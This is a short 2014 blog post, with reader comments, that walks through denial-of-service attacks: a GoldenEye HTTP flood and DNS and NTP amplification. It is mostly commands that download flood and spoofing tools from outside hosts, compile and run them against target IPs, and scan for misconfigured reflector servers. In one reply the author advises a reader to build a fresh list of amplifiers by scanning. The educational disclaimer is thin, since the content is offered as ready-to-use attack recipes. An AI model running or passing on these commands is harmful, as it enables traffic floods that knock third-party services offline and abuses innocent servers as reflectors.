Friday, 21 February 2014

DDoS / DoS / amplification attacks ++

1st post in 2014... finally! After 8 or so months of looking at the screen I managed to remember how to use my keyboard... and what more trendy and appropriate than a tribute to DoS attacks :) so go on! Get yourselves in trouble! (please dont!) DISCLAIMER: All information here is for educational purposes, may the Force be with you!

Russia's dirty secret (Golden eye):

Attack Vector exploited: HTTP Keep Alive + NoCache

wget https://raw.github.com/jseidl/GoldenEye/master/goldeneye.py

python goldeneye.py http://192.168.1.10 -w 10 -s 6 -m random

(thats the light-handed approach...)

DNS Amplification attack:

Well documented attack taking advantage of UDP packet spoofing and miss-configured DNS servers

How to test:
dig ANY isc.org @x.x.x.x
Where to test:
http://openresolverproject.org/

The tool (good old packetstorm):
wget http://packetstorm.foofus.com/DoS/dns_spquery.c.gz
gunzip dns_spquery.c.gz
gcc dns_spquery.c -o dns_spquery

./dns_spquery <target_ip> <dns_to_use> <some_fqdn_to_resolve>

NTP Amplification attack:

Well documented attack taking advantage of UDP packet spoofing and miss-configured NTP servers

How to test:
ntpdc -c monlist <target_ntp_server>
or
nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target_ntp_server>
(script available here http://nmap.org/svn/scripts/ntp-monlist.nse)
Where to test:
http://openntpproject.org/

The tool:
wget https://gist.githubusercontent.com/anonymous/d3abecdf9e828b3b7c37/raw/efe9154d88c67e2a1775a2f58cf2396ccc1e463d/gistfile1.pl
perl gistfile1.pl <target_IP> <src_port> <duration_in_sec> <list_file_name> <packet_payload_repetition??> <thread_number>

so that would be
perl gistfile1.pl 192.168.1.1 53 60 list.txt 2 10
or something similar...


Stay tuned for more..


2 comments:

  1. on ntp, where can i get the list.txt from?

    ReplyDelete
    Replies
    1. hey mitchell, you create you own list.txt via the nmap scanning method. its always best to collect fresh results rather than using some ready-made list :)

      Delete